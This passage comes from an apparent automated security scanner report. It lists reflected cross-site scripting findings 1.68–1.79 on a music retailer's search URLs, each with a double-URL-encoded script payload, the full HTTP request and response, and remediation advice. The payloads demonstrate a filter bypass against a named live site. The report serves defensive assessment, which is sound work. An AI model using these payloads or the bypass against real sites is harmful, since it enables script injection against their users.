GET /search/query/Canyonsc4aec%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0586550ec47&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=23cfi7dkdv6euokblfnf809cb5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:26 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=562430432; expires=Sun, 09-Jan-2011 02:39:26 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=260157307; expires=Sun, 09-Jan-2011 02:39:26 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Canyonsc4aec"><script>alert(1)</script>0586550ec47" />
...[SNIP]...

1.68. http://www.insound.com/search/query/Canyons&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Canyons&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload baf0d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f68ad9cfd1 was submitted in the REST URL parameter 3. This input was echoed as baf0d</title><script>alert(1)</script>3f68ad9cfd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Removing the second decode closes this particular bypass but is not a complete fix: the value is written between the TITLE tags with no HTML encoding, so it should be HTML-encoded at that point regardless of which characters the filter rejects.

Request

GET /search/query/Canyonsbaf0d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f68ad9cfd1&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=192g9qr8irckn6j07d67q5lmp6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:32 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=15358187; expires=Sun, 09-Jan-2011 02:39:32 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=348620053; expires=Sun, 09-Jan-2011 02:39:32 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Canyonsbaf0d</title><script>alert(1)</script>3f68ad9cfd1</title>
...[SNIP]...

1.69. http://www.insound.com/search/query/Cap'n%20Jazz&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cap'n%20Jazz&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56c27%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32f749fe2ff was submitted in the REST URL parameter 3. This input was echoed as 56c27"><script>alert(1)</script>32f749fe2ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Cap'n%20Jazz56c27%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32f749fe2ff&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ras5gq5ldjs5do65vde1vcajf2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:28 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=98800130; expires=Sun, 09-Jan-2011 02:39:28 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=173560589; expires=Sun, 09-Jan-2011 02:39:28 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Cap'n Jazz56c27"><script>alert(1)</script>32f749fe2ff" />
...[SNIP]...

1.70. http://www.insound.com/search/query/Cap'n%20Jazz&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cap'n%20Jazz&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload e32f6%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec355903f322 was submitted in the REST URL parameter 3. This input was echoed as e32f6</title><script>alert(1)</script>c355903f322 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Cap'n%20Jazze32f6%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec355903f322&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=qaht89fih3ci04hf1avtcfuk21; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:36 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=49091725; expires=Sun, 09-Jan-2011 02:39:36 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=209453078; expires=Sun, 09-Jan-2011 02:39:36 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Cap'n Jazze32f6</title><script>alert(1)</script>c355903f322</title>
...[SNIP]...

1.71. http://www.insound.com/search/query/Capgun%20Coup&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capgun%20Coup&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdc37%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edd2f0793f4b was submitted in the REST URL parameter 3. This input was echoed as cdc37"><script>alert(1)</script>dd2f0793f4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capgun%20Coupcdc37%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edd2f0793f4b&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=2p4ihkcj1ge6bir4i2nkndned3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:33 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=181407271; expires=Sun, 09-Jan-2011 02:39:33 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=135705573; expires=Sun, 09-Jan-2011 02:39:33 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Capgun Coupcdc37"><script>alert(1)</script>dd2f0793f4b" />
...[SNIP]...

1.72. http://www.insound.com/search/query/Capgun%20Coup&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capgun%20Coup&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 1e0a4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b98189875 was submitted in the REST URL parameter 3. This input was echoed as 1e0a4</title><script>alert(1)</script>2b98189875 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capgun%20Coup1e0a4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b98189875&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=cpa16osek4qsfvqk0ncgomehp4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:39 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=437010282; expires=Sun, 09-Jan-2011 02:39:39 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=109102112; expires=Sun, 09-Jan-2011 02:39:39 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Capgun Coup1e0a4</title><script>alert(1)</script>2b98189875</title>
...[SNIP]...

1.73. http://www.insound.com/search/query/Capillary%20Action&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capillary%20Action&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14eee%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1db6f4912 was submitted in the REST URL parameter 3. This input was echoed as 14eee"><script>alert(1)</script>a1db6f4912 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capillary%20Action14eee%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1db6f4912&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ksc1b51m487hvb53rldte4pfo7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:33 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=562347066; expires=Sun, 09-Jan-2011 02:39:33 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=381684379; expires=Sun, 09-Jan-2011 02:39:33 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Capillary Action14eee"><script>alert(1)</script>a1db6f4912" />
...[SNIP]...

1.74. http://www.insound.com/search/query/Capillary%20Action&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capillary%20Action&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 8010f%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0d79cebd7c6 was submitted in the REST URL parameter 3. This input was echoed as 8010f</title><script>alert(1)</script>0d79cebd7c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capillary%20Action8010f%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0d79cebd7c6&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=7p679rjrstnk4nd4jj6gqemgj6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:39 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=204356903; expires=Sun, 09-Jan-2011 02:39:39 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=30953910; expires=Sun, 09-Jan-2011 02:39:39 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Capillary Action8010f</title><script>alert(1)</script>0d79cebd7c6</title>
...[SNIP]...

1.75. http://www.insound.com/search/query/Capitol%20City%20Dusters&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capitol%20City%20Dusters&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload be42c%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec9962230acd was submitted in the REST URL parameter 3. This input was echoed as be42c</title><script>alert(1)</script>c9962230acd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capitol%20City%20Dustersbe42c%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec9962230acd&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=o3jhcmkijvkccgqo9m0bbp85j4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:42 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=238544957; expires=Sun, 09-Jan-2011 02:39:42 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=317659291; expires=Sun, 09-Jan-2011 02:39:42 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Capitol City Dustersbe42c</title><script>alert(1)</script>c9962230acd</title>
...[SNIP]...

1.76. http://www.insound.com/search/query/Capitol%20City%20Dusters&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capitol%20City%20Dusters&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd0e8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e22e682c610 was submitted in the REST URL parameter 3. This input was echoed as fd0e8"><script>alert(1)</script>22e682c610 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capitol%20City%20Dustersfd0e8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e22e682c610&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=0kemccb7imolme9nf5ac1gfih4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:35 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=235614585; expires=Sun, 09-Jan-2011 02:39:35 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=382287926; expires=Sun, 09-Jan-2011 02:39:35 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Capitol City Dustersfd0e8"><script>alert(1)</script>22e682c610" />
...[SNIP]...

1.77. http://www.insound.com/search/query/Capitol%20K&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capitol%20K&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 82ab8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed63e39fc802 was submitted in the REST URL parameter 3. This input was echoed as 82ab8</title><script>alert(1)</script>d63e39fc802 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capitol%20K82ab8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed63e39fc802&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=77vf9017o4risrl7b0fr2908v5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:44 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=433591705; expires=Sun, 09-Jan-2011 02:39:44 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=359263493; expires=Sun, 09-Jan-2011 02:39:44 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Capitol K82ab8</title><script>alert(1)</script>d63e39fc802</title>
...[SNIP]...

1.78. http://www.insound.com/search/query/Capitol%20K&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capitol%20K&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91fab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef962b5e103a was submitted in the REST URL parameter 3. This input was echoed as 91fab"><script>alert(1)</script>f962b5e103a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capitol%20K91fab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef962b5e103a&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=akrp2c5srknd2pv3388nqi9m45; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:37 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=176259706; expires=Sun, 09-Jan-2011 02:39:37 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=541695709; expires=Sun, 09-Jan-2011 02:39:37 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Capitol K91fab"><script>alert(1)</script>f962b5e103a" />
...[SNIP]...

1.79. http://www.insound.com/search/query/Capleton%20&%20Jah%20Mali&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capleton%20&%20Jah%20Mali&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69924%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e813b74ec99f was submitted in the REST URL parameter 3. This input was echoed as 69924"><script>alert(1)</script>813b74ec99f in the application's response.

